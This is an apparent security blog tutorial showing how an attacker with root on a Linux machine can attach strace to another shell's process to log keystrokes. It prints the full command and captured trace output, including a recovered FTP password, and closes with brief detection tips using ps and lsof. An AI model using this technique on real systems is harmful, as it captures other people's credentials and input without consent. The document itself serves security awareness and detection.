The strace tool is commonly used for debugging applications
in Linux, tracing system calls and signals. Because it is more than likely already
a part of your OS, we will look at how an attacker can use a tool which is
already there to his advantage.
Assumption: The attacker is currently on the machine we are
using
For this example, we will perform the following:
1. Initiate and attach strace
to a specific PID
2. Capture all key strokes from
this PID and or any child it forks (creates)
3. Store this information to a
file for offline analysis
Let’s begin!
Let’s see what shells we currently have available
root@securitynik:~# ps aux | grep bash
root
3103 0.0 0.6
6140 3392 pts/0 Ss+
17:14 0:00 bash
root 3199 0.0
0.6 6140 3540 pts/1
Ss 17:18 0:00 bash
root 3373 0.0
0.1 3488 768 pts/1
S+ 18:06 0:00 grep bash
Hmmm. Let’s see which one belongs to us
root@securitynik:~# tty
/dev/pts/1
Looks like we are currently using /dev/pts/1. Guess that means /dev/pts/0 is
the one we should hook into. Let’s do that.
Let’s start strace and send it to the background
root@securitynik:~# strace
-p 3103 -t -e write -q -f -o keylogger.txt &
[1] 3432
Above we are telling strace to do the following:
1. –p 3103: connect to PID 3103, which above is on pts/0
2. –t : print the time of day
3. –e write: only capture write calls
4. –q : be quiet
5. –f : follow any fork (created) process
6. –o keylogger.txt: output the results to a file named keylogger.txt
using the console with the PID 3103 let’s run a few commands and connect to a
remote system running FTP:
root@securitynik:~# id
uid=0(root) gid=0(root) groups=0(root)
root@securitynik:~# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@securitynik:~# ftp 192.168.0.50
Connected to 192.168.0.50.
220 Microsoft FTP Service
Name (192.168.0.50:root): administrator
331 Password required for administrator.
Password:
230-Welcome to securitynik FTP Server :-D
230 User administrator logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> exit
221 Do return soon :-)
So the above commands were run but what did we capture?
Let’s find out … the file will be truncated for brevity
root@securitynik:~# cat keylogger.txt |
more
-------- results from the ID command ---------
3103 18:20:51 write(2, "i", 1) = 1
3103 18:20:51 write(2, "d", 1) = 1
3103 18:20:52 write(2, "\n",
1) = 1
3449 18:20:52 write(1, "uid=0(root) gid=0(root) groups=0"...,
39) = 39
--------- results from cat /etc/passwd
3103 18:20:57 write(2, "c", 1) = 1
3103 18:20:57 write(2, "a", 1) = 1
3103 18:20:57 write(2, "t", 1) = 1
3103 18:20:57 write(2, " ", 1) = 1
3103 18:20:58 write(2, "/", 1) = 1
3103 18:20:58 write(2, "e", 1) = 1
3103 18:20:58 write(2, "t", 1) = 1
……..
3103 18:20:59 write(3, "/etc", 4) = 4
3103 18:20:59 write(3, "\n",
1) = 1
3103 18:20:59 write(2, "c/", 2) = 2
3103 18:21:01 write(2, "p", 1) = 1
3103 18:21:01 write(2, "a", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "s", 1) = 1
3103 18:21:01 write(2, "w", 1) = 1
3103 18:21:02 write(2, "d", 1) = 1
3103 18:21:02 write(2, "\n",
1) = 1
3468 18:21:02 write(1, "root:x:0:0:root:/root:/bin/bash\n"...,
2279) = 2279
---------- and last but not least the results from the FTP session
--------
103 18:21:02 write(2,
"\33]0;root@securitynik: ~\7\33[01;31m"..., 70) = 70
3103 18:21:17 write(2, "f", 1) = 1
3103 18:21:18 write(2, "t", 1) = 1
3103 18:21:18 write(2, "p", 1) = 1
…..
3103 18:21:24 write(2, "1", 1) = 1
3103 18:21:24 write(2, "9", 1) = 1
3103 18:21:24 write(2, "2", 1) = 1
3103 18:21:24 write(2, ".", 1) = 1
3103 18:21:25 write(2, "1", 1) = 1
3103 18:21:25 write(2, "6", 1) = 1
3103 18:21:25 write(2, "8", 1) = 1
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "0", 1) =
3103 18:21:26 write(2, ".", 1) = 1
3103 18:21:26 write(2, "5", 1) = 1
3103 18:21:26 write(2, "0", 1) = 1
3103 18:21:27 write(2, "\n",
1) = 1
3470 18:21:27 write(1, "Connected to 192.168.0.50.\n",
27) = 27
3470 18:21:27 write(1, "220 Microsoft
FTP Service\n", 26) = 26
3470 18:21:27 write(1, "Name (192.168.0.50:root):
", 26) = 26
3470 18:21:31 write(5, "USER administrator\r\n", 20) = 20
3470 18:21:31 write(1, "331
Password required for admini"..., 41) = 41
3470 18:21:31 write(6,
"Password:", 9) = 9
3470 18:21:35 write(6, "\n",
1) = 1
3470 18:21:35 write(5, "PASS Testing1\r\n", 15) = 15
3470 18:21:35 write(1, "230-Welcome
to securitynik FTP S"..., 42) = 42
3470 18:21:35 write(1, "230 User administrator logged in"...,
34) = 34
3470 18:21:35 write(5,
"SYST\r\n", 6) = 6
3470 18:21:35 write(1, "Remote
system type is Windows_NT"..., 34) = 34
3470 18:21:35 write(1, "ftp>
", 5) = 5
3470 18:21:38 write(1, "d", 1) = 1
3470 18:21:39 write(1, "i", 1) = 1
3470 18:21:39 write(1, "r", 1) = 1
3470 18:21:39 write(1, "\n",
1) = 1
3470 18:21:39 write(5, "PORT 192,168,0,15,230,54\r\n",
26) = 26
3470 18:21:39 write(1, "200 PORT command
successful.\n", 29) = 29
3470 18:21:39 write(5, "LIST\r\n",
6) = 6
3470 18:21:39 write(1, "150 Opening
ASCII mode data conn"..., 52) = 52
3470 18:21:39 write(1, "226 Transfer
complete.\n", 23) = 23
3470 18:21:39 write(1, "ftp>
", 5) = 5
3470 18:21:43 write(1, "e", 1) = 1
3470 18:21:43 write(1, "x", 1) = 1
3470 18:21:44 write(1, "i", 1) = 1
3470 18:21:44 write(1, "t",
1) = 1
3470 18:21:44 write(1, "\n",
1) = 1
3470 18:21:44 write(5,
"QUIT\r\n", 6) = 6
3470 18:21:44 write(1, "221 Do
return soon :-) \n", 24) = 24
3103 18:21:44 --- SIGCHLD (Child exited)
@ 0 (0) ---
3103 18:21:44 write(2, "\33]0;root@securitynik:
~\7\33[01;31m"..., 70) = 70
As can be seen, the tools on our systems can easily be used
for good just as it can for bad.
How to mitigate this?
Be aware of what processes you expect to see on your systems
If you don’t use strace for debugging and see it in your “ps
aux” output, then you may need to investigate why it may be there.
root@securitynik:~# ps aux | grep strace
root
3432 0.0 0.1
2088 644 pts/1 S
18:15 0:00 strace -p 3103 -t -e
write -q -f -o keylogger.txt
Further checks
root@securitynik:~# lsof | grep strace
strace 3432 root cwd
DIR 8,1
4096 785892 /root
strace 3432 root rtd
DIR 8,1
4096 2 /
strace 3432 root txt
REG 8,1 207880
785911 /usr/bin/strace
strace 3432 root mem
REG 8,1 1441960
655121 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
strace 3432 root mem
REG 8,1 117960
679406 /lib/i386-linux-gnu/ld-2.13.so
strace 3432 root 0u
CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 1u
CHR 136,1 0t0
4 /dev/pts/1
strace 3432 root 2u
CHR 136,1 0t0 4 /dev/pts/1
strace 3432 root 3w
REG 8,1 4782
800789 /root/keylogger.txt